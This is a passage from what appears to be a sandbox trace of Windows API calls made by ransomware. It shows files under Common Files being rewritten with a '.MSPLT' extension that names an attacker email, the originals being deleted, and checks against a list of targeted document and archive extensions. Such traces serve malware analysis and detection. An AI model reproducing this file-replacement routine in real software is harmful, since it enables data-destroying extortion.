Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.759] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=15984) returned 1 [0296.759] CloseHandle (hObject=0x3d0) returned 1 [0296.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 0x20 [0296.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.760] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.760] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.956] GetLastError () returned 0x0 [0296.956] ReadFile (in: hFile=0x3d0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x3e70, lpOverlapped=0x0) returned 1 [0296.968] WriteFile (in: hFile=0x480, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x3e80, lpOverlapped=0x0) returned 1 [0296.970] ReadFile (in: hFile=0x3d0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0296.970] WriteFile (in: hFile=0x480, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xec, lpOverlapped=0x0) returned 1 [0296.970] SetEndOfFile (hFile=0x480) returned 1 [0296.971] CloseHandle (hObject=0x480) returned 1 [0296.976] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0296.976] SetEndOfFile (hFile=0x3d0) returned 1 [0297.334] CloseHandle (hObject=0x3d0) returned 1 [0297.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0297.335] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 1 [0297.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.337] lstrlenW (lpString=".doc") returned 4 [0297.337] lstrcmpiW (lpString1=".doc", lpString2=".OLB") returned -1 [0297.337] lstrlenW (lpString=".docx") returned 5 [0297.337] lstrcmpiW (lpString1=".docx", lpString2="R.OLB") returned -1 [0297.337] lstrlenW (lpString=".pdf") returned 4 [0297.337] lstrcmpiW (lpString1=".pdf", lpString2=".OLB") returned 1 [0297.337] lstrlenW (lpString=".xls") returned 4 [0297.337] lstrcmpiW (lpString1=".xls", lpString2=".OLB") returned 1 [0297.337] lstrlenW (lpString=".xlsx") returned 5 [0297.337] lstrcmpiW (lpString1=".xlsx", lpString2="R.OLB") returned -1 [0297.337] lstrlenW (lpString=".ppt") returned 4 [0297.337] lstrcmpiW (lpString1=".ppt", lpString2=".OLB") returned 1 [0297.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.337] lstrlenW (lpString=".zip") returned 4 [0297.337] lstrcmpiW (lpString1=".zip", lpString2=".OLB") returned 1 [0297.337] lstrlenW (lpString=".rar") returned 4 [0297.337] lstrcmpiW (lpString1=".rar", lpString2=".OLB") returned 1 [0297.337] lstrlenW (lpString=".bz2") returned 4 [0297.337] lstrcmpiW (lpString1=".bz2", lpString2=".OLB") returned -1 [0297.337] lstrlenW (lpString=".7z") returned 3 [0297.337] lstrcmpiW (lpString1=".7z", lpString2="OLB") returned -1 [0297.337] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.338] lstrlenW (lpString=".dbf") returned 4 [0297.338] lstrcmpiW (lpString1=".dbf", lpString2=".OLB") returned -1 [0297.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.338] lstrlenW (lpString=".1cd") returned 4 [0297.338] lstrcmpiW (lpString1=".1cd", lpString2=".OLB") returned -1 [0297.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.338] lstrlenW (lpString=".jpg") returned 4 [0297.338] lstrcmpiW (lpString1=".jpg", lpString2=".OLB") returned -1 [0297.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.338] lstrlenW (lpString=".doc") returned 4 [0297.338] lstrcmpiW (lpString1=".doc", lpString2=".OLB") returned -1 [0297.338] lstrlenW (lpString=".docx") returned 5 [0297.338] lstrcmpiW (lpString1=".docx", lpString2="R.OLB") returned -1 [0297.338] lstrlenW (lpString=".pdf") returned 4 [0297.338] lstrcmpiW (lpString1=".pdf", lpString2=".OLB") returned 1 [0297.338] lstrlenW (lpString=".xls") returned 4 [0297.338] lstrcmpiW (lpString1=".xls", lpString2=".OLB") returned 1 [0297.338] lstrlenW (lpString=".xlsx") returned 5 [0297.338] lstrcmpiW (lpString1=".xlsx", lpString2="R.OLB") returned -1 [0297.338] lstrlenW (lpString=".ppt") returned 4 [0297.338] lstrcmpiW (lpString1=".ppt", lpString2=".OLB") returned 1 [0297.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.338] lstrlenW (lpString=".zip") returned 4 [0297.338] lstrcmpiW (lpString1=".zip", lpString2=".OLB") returned 1 [0297.338] lstrlenW (lpString=".rar") returned 4 [0297.339] lstrcmpiW (lpString1=".rar", lpString2=".OLB") returned 1 [0297.339] lstrlenW (lpString=".bz2") returned 4 [0297.339] lstrcmpiW (lpString1=".bz2", lpString2=".OLB") returned -1 [0297.339] lstrlenW (lpString=".7z") returned 3 [0297.339] lstrcmpiW (lpString1=".7z", lpString2="OLB") returned -1 [0297.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.339] lstrlenW (lpString=".dbf") returned 4 [0297.339] lstrcmpiW (lpString1=".dbf", lpString2=".OLB") returned -1 [0297.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.339] lstrlenW (lpString=".1cd") returned 4 [0297.339] lstrcmpiW (lpString1=".1cd", lpString2=".OLB") returned -1 [0297.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0297.339] lstrlenW (lpString=".jpg") returned 4 [0297.339] lstrcmpiW (lpString1=".jpg", lpString2=".OLB") returned -1 [0297.339] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0297.339] lstrlenW (lpString="msader15.dll.mui") returned 16 [0297.339] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.342] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=17920) returned 1 [0297.342] CloseHandle (hObject=0x3d0) returned 1 [0297.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0x20 [0297.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.343] lstrlenW (lpString=".doc") returned 4 [0297.343] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0297.343] lstrlenW (lpString=".docx") returned 5 [0297.343] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0297.343] lstrlenW (lpString=".pdf") returned 4 [0297.343] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0297.343] lstrlenW (lpString=".xls") returned 4 [0297.343] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0297.343] lstrlenW (lpString=".xlsx") returned 5 [0297.343] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0297.343] lstrlenW (lpString=".ppt") returned 4 [0297.343] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0297.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.343] lstrlenW (lpString=".zip") returned 4 [0297.343] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0297.343] lstrlenW (lpString=".rar") returned 4 [0297.343] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0297.343] lstrlenW (lpString=".bz2") returned 4 [0297.343] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0297.343] lstrlenW (lpString=".7z") returned 3 [0297.343] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0297.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.344] lstrlenW (lpString=".dbf") returned 4 [0297.344] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0297.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.344] lstrlenW (lpString=".1cd") returned 4 [0297.344] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0297.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.344] lstrlenW (lpString=".jpg") returned 4 [0297.344] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0297.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.344] lstrlenW (lpString=".doc") returned 4 [0297.344] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0297.344] lstrlenW (lpString=".docx") returned 5 [0297.344] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0297.344] lstrlenW (lpString=".pdf") returned 4 [0297.344] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0297.344] lstrlenW (lpString=".xls") returned 4 [0297.344] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0297.344] lstrlenW (lpString=".xlsx") returned 5 [0297.344] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0297.344] lstrlenW (lpString=".ppt") returned 4 [0297.344] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0297.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.344] lstrlenW (lpString=".zip") returned 4 [0297.344] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0297.345] lstrlenW (lpString=".rar") returned 4 [0297.345] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0297.345] lstrlenW (lpString=".bz2") returned 4 [0297.345] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0297.345] lstrlenW (lpString=".7z") returned 3 [0297.345] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0297.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.345] lstrlenW (lpString=".dbf") returned 4 [0297.345] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0297.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.345] lstrlenW (lpString=".1cd") returned 4 [0297.345] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0297.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0297.345] lstrlenW (lpString=".jpg") returned 4 [0297.345] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0297.345] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0297.345] lstrlenW (lpString="msader15.dll") returned 12 [0297.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.347] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=2560) returned 1 [0297.347] CloseHandle (hObject=0x3d0) returned 1 [0297.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll")) returned 0x20 [0297.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.347] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.347] lstrlenW (lpString=".doc") returned 4 [0297.348] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0297.348] lstrlenW (lpString=".docx") returned 5 [0297.348] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0297.348] lstrlenW (lpString=".pdf") returned 4 [0297.348] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0297.348] lstrlenW (lpString=".xls") returned 4 [0297.348] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0297.348] lstrlenW (lpString=".xlsx") returned 5 [0297.348] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0297.348] lstrlenW (lpString=".ppt") returned 4 [0297.348] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0297.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.348] lstrlenW (lpString=".zip") returned 4 [0297.348] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0297.348] lstrlenW (lpString=".rar") returned 4 [0297.348] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0297.348] lstrlenW (lpString=".bz2") returned 4 [0297.348] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0297.348] lstrlenW (lpString=".7z") returned 3 [0297.348] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0297.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.348] lstrlenW (lpString=".dbf") returned 4 [0297.348] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0297.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.348] lstrlenW (lpString=".1cd") returned 4 [0297.349] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0297.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.349] lstrlenW (lpString=".jpg") returned 4 [0297.349] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.349] lstrlenW (lpString=".doc") returned 4 [0297.349] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString=".docx") returned 5 [0297.349] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0297.349] lstrlenW (lpString=".pdf") returned 4 [0297.349] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString=".xls") returned 4 [0297.349] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString=".xlsx") returned 5 [0297.349] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0297.349] lstrlenW (lpString=".ppt") returned 4 [0297.349] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.349] lstrlenW (lpString=".zip") returned 4 [0297.349] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString=".rar") returned 4 [0297.349] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0297.349] lstrlenW (lpString=".bz2") returned 4 [0297.349] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0297.350] lstrlenW (lpString=".7z") returned 3 [0297.350] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0297.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.350] lstrlenW (lpString=".dbf") returned 4 [0297.350] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0297.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.350] lstrlenW (lpString=".1cd") returned 4 [0297.350] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0297.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0297.350] lstrlenW (lpString=".jpg") returned 4 [0297.350] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0297.350] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0297.350] lstrlenW (lpString="msado15.dll") returned 11 [0297.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.352] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=1233920) returned 1 [0297.352] CloseHandle (hObject=0x3d0) returned 1 [0297.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")) returned 0x20 [0297.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.353] lstrlenW (lpString=".doc") returned 4 [0297.353] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0297.353] lstrlenW (lpString=".docx") returned 5 [0297.353] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0297.353] lstrlenW (lpString=".pdf") returned 4 [0297.353] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0297.353] lstrlenW (lpString=".xls") returned 4 [0297.353] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0297.353] lstrlenW (lpString=".xlsx") returned 5 [0297.353] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0297.353] lstrlenW (lpString=".ppt") returned 4 [0297.353] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0297.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.353] lstrlenW (lpString=".zip") returned 4 [0297.353] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0297.353] lstrlenW (lpString=".rar") returned 4 [0297.353] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0297.353] lstrlenW (lpString=".bz2") returned 4 [0297.353] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0297.353] lstrlenW (lpString=".7z") returned 3 [0297.353] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0297.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.353] lstrlenW (lpString=".dbf") returned 4 [0297.354] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0297.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.354] lstrlenW (lpString=".1cd") returned 4 [0297.354] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0297.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.354] lstrlenW (lpString=".jpg") returned 4 [0297.354] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0297.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.354] lstrlenW (lpString=".doc") returned 4 [0297.354] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0297.354] lstrlenW (lpString=".docx") returned 5 [0297.354] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0297.354] lstrlenW (lpString=".pdf") returned 4 [0297.354] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0297.354] lstrlenW (lpString=".xls") returned 4 [0297.354] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0297.354] lstrlenW (lpString=".xlsx") returned 5 [0297.354] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0297.354] lstrlenW (lpString=".ppt") returned 4 [0297.354] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0297.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.354] lstrlenW (lpString=".zip") returned 4 [0297.354] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0297.354] lstrlenW (lpString=".rar") returned 4 [0297.355] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0297.355] lstrlenW (lpString=".bz2") returned 4 [0297.355] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0297.355] lstrlenW (lpString=".7z") returned 3 [0297.355] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0297.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.355] lstrlenW (lpString=".dbf") returned 4 [0297.355] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0297.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.355] lstrlenW (lpString=".1cd") returned 4 [0297.355] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0297.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0297.355] lstrlenW (lpString=".jpg") returned 4 [0297.355] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0297.355] lstrcmpiW (lpString1=".tlb", lpString2=".MSPLT") returned 1 [0297.355] lstrlenW (lpString="msado20.tlb") returned 11 [0297.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.358] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=50688) returned 1 [0297.358] CloseHandle (hObject=0x3d0) returned 1 [0297.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb")) returned 0x20 [0297.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.359] lstrlenW (lpString=".doc") returned 4 [0297.359] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString=".docx") returned 5 [0297.359] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0297.359] lstrlenW (lpString=".pdf") returned 4 [0297.359] lstrcmpiW (lpString1=".pdf", 